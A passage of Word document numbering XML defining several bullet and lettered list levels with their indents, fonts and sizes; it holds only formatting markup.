        <w:ind w:left="1264" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="15F4B624">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1984" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F3107854">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3893" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="AF98DE42">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5806" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="44FCF7F6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7720" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="32E4E5EE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9633" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="979E1AD8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11546" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4484D4EE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13460" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5A6E8050">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15373" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="12B84CFF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42925B26"/>
    <w:lvl w:ilvl="0" w:tplc="15A842D8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1662" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B97E9FF2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1456" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="44"/>
        <w:szCs w:val="44"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="769EEC5E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1863" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="68E82DF4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2595" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="371A585A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F9EC7DC4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5366" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6F9ACA80">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8133" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="23246A5E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10900" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="39F858F2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13666" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="12F61DAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AFEEBA26"/>
    <w:lvl w:ilvl="0" w:tplc="CF9AF548">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1051" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6816A894">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1841" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E3BC37AE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2491" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="77C43B42">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4587" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B366DF22">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6675" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BC70953C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8762" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C0F4CD86">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10850" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1C56739E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12937" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D3EC7CDE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15025" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="17507EF8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0E621F6"/>
    <w:lvl w:ilvl="0" w:tplc="48B48800">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1044" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="52"/>
        <w:szCs w:val="52"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E59E8B56">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2856" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E9260DD6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4672" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="137CC2E6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6488" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="753AB1BA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8304" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C672AC64">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EF0E81FE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11936" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="85220B7A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13752" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BB0C65A0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15568" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="19353A1D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A5E9828"/>
    <w:lvl w:ilvl="0" w:tplc="C87E1D66">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1239" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="38907968">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1959" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E84E7C8A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2679" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5874B618">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4745" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5EA67466">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6810" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E478908E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8875" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="27507B6E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10940" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A13601AC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13005" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7E562CD4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15070" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1D632903"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A4C56CA"/>
    <w:lvl w:ilvl="0" w:tplc="F61AFBEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1364" w:hanging="812"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="-6"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C73AAD42">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3144" w:hanging="812"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3320B7F8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4928" w:hanging="812"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2542DFB2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6712" w:hanging="812"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3DE4A6B4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8496" w:hanging="812"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E620D62C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10280" w:hanging="812"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D0F6F140">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12064" w:hanging="812"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B95E04E4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13848" w:hanging="812"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1F742176">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15632" w:hanging="812"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1F30223F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25B84C24"/>
    <w:lvl w:ilvl="0" w:tplc="97A2B5EC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="939" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AA0C01C8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1824" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A2F630DE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3751" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4240E63C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5682" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
